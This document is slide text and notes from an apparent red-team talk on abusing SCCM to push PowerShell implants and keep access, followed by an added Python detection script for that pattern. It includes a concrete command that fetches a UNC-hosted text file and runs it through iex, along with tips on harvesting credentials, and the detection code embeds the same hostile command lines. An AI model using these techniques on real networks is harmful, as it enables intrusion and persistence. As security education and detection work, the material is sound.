Very targeted, strategic use instead of mass compromise
- External? Grab some workstation, reverse SSH tunnel w/ RDP access, RDP from there into the SCCM server
- This is solely post-exploitation/maintaining access (3:00)
- Service account/LA credentials are often left in install scripts/notes
- If Right Click Tools is installed on the server, it is basically your own internal C2 controller
- List running processes, system information, registry access, SYSTEM command shell
- Uses PsExec, which is naughty on red teams...
- This shell doesn't work unless they put PsExec on the server... meaning if it exists, it will likely blend in just fine.
Might have access to all distribution points as well as the central site server due to administration overhead (9:00)
- If an application remains pushed out, hosts will continue to execute it during their normal check-ins
- An open share is a common setup, as the SCCM agents have to grab the deployed installation packages somehow.
- PowerShell reaches out over UNC to grab the contents of a text file and execute it (12:00)
Red Team Upgrades: Using SCCM for Malware Deployment
❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group
❖ Active developer on the PowerShell Empire project
❖ Offensive PowerShell advocate
❖ 2nd time speaking!
❖ This con is probably older than I am
❖ Indiana corn farmer turned h4x0r (not really)
What this is...
❖ What SCCM is and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise.
➢ I’m going to cover targeted, strategic use as opposed to mass pwnage
Setting the Stage
❖ This talk assumes you have RDP access to a SCCM
❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not on obtaining access to SCCM.
❖ No, having access to SCCM does not mean you own the
❖ If you administer SCCM as a domain admin, you fail.
What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts are hosted on the SCCM server
❖ Setup and maintained via an agent/server architecture
❖ Consists of a central site server with distribution points.
➢ Agents check in to server periodically to obtain new
❖ Basically acts as internal RAT/C2
SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups
➢ e.g. “SCCM Admins” in AD
❖ Typically set up/configured using a service account to run the application/push updates
❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share
❖ Admins gonna admin
Right Click Tools
❖ Add-On that can be installed to assist in client
❖ Should be installed on a client such as an administrative workstation... not on the server
➢ Admins install it on the server anyways
❖ Enables full control of managed endpoints
Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
➢ Take control of the server and you have distributed workstation control
➢ SCCM agents are just waiting to run your code
❖ Live off the land
➢ Keep your malicious implant count low, use SCCM for very targeted
➢ Looks like normal day-to-day traffic/activity
➢ To limit the risk of getting caught, become an admin and not a typical
Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
➢ Able to push implants out in a very controlled and surgical manner
❖ Also acts as a persistence mechanism
Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
➢ This allows for admins to create specific groups for departments
❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic
Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for payload delivery and execution
❖ Do so by creating a PowerShell payload and throw it up
on the public share SCCM uses (typically something like
Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute
➢ cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""
❖ Deploy the application to your target group and wait for the SCCM agents to check in
➢ Payload is fetched over UNC and runs in memory
❖ More here:
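As an added, defender-side example (not from the talk or its author), here is the detection logic a SOC could run over process-creation events to catch exactly the deployment pattern above: the SCCM client (CcmExec.exe) spawning a shell whose command line pipes a UNC-hosted text file into Invoke-Expression. The event layout, the host name sccm01 and the share paths are constructed for the sample.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events in a simplified "parent|image|command line"
# layout (the fields a Sysmon Event ID 1 or Security 4688 record carries).
# Events 1 and 4 model the talk's deployment pattern; events 2 and 3 are benign.
SAMPLE_EVENTS = [
    r'C:\Windows\CCM\CcmExec.exe|C:\Windows\System32\cmd.exe|cmd.exe /c "powershell.exe -c "gc \\sccm01\SMSPKGC$\App01\payload.txt | iex""',
    r'C:\Windows\CCM\CcmExec.exe|C:\Windows\System32\msiexec.exe|msiexec.exe /i "C:\Windows\ccmcache\a1\7z.msi" /qn',
    r'C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -c "Get-Content \\fileserver\docs\notes.txt"',
    r'C:\Windows\CCM\CcmExec.exe|C:\Windows\System32\cmd.exe|cmd.exe /c "powershell.exe -nop -w hidden -c "Invoke-Expression (Get-Content \\sccm01\SMSPKGC$\App02\x.txt -Raw)""',
]

SCCM_CLIENT = re.compile(r"\\ccmexec\.exe$", re.IGNORECASE)
# A Get-Content style read (or one of its aliases) whose argument is a UNC path;
# group 2 captures the \\host part.
UNC_READ = re.compile(r"\b(gc|cat|type|get-content)\b[^|;]*?(\\\\[^\\\s\"']+)", re.IGNORECASE)
INVOKE_EXPR = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)

@dataclass
class Finding:
    line_no: int
    unc_host: str        # server the payload text was read from ("" if inline)
    command_line: str

def analyze(events: list) -> list:
    """One Finding per event where the SCCM client spawned a process that runs
    Invoke-Expression; locally cached MSI / -File installers are left alone."""
    findings = []
    for n, line in enumerate(events, 1):
        parent, _image, cmd = line.split("|", 2)   # maxsplit keeps '|' in cmd
        if not SCCM_CLIENT.search(parent):
            continue                                # not spawned by the SCCM agent
        if not INVOKE_EXPR.search(cmd):
            continue                                # no dynamic evaluation
        unc = UNC_READ.search(cmd)
        host = unc.group(2).lstrip("\\") if unc else ""
        findings.append(Finding(n, host, cmd))
    return findings

def payload_hosts(events: list) -> set:
    """Distinct hosts that served IEX payloads: the shares to audit for stray
    .txt payloads and overly open permissions."""
    return {f.unc_host for f in analyze(events) if f.unc_host}

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f.line_no}: IEX payload from {f.unc_host or 'inline'}: {f.command_line}")
```

Feeding real Sysmon or 4688 exports through the same two gates (SCCM parent, Invoke-Expression in the child) keeps ordinary package installs out of the alert queue while surfacing the UNC-fetched payload pattern.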
Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and GitHub
❖ enigma0x3 on Freenode: #psempire
❖ Blog: enigma0x3.wordpress.com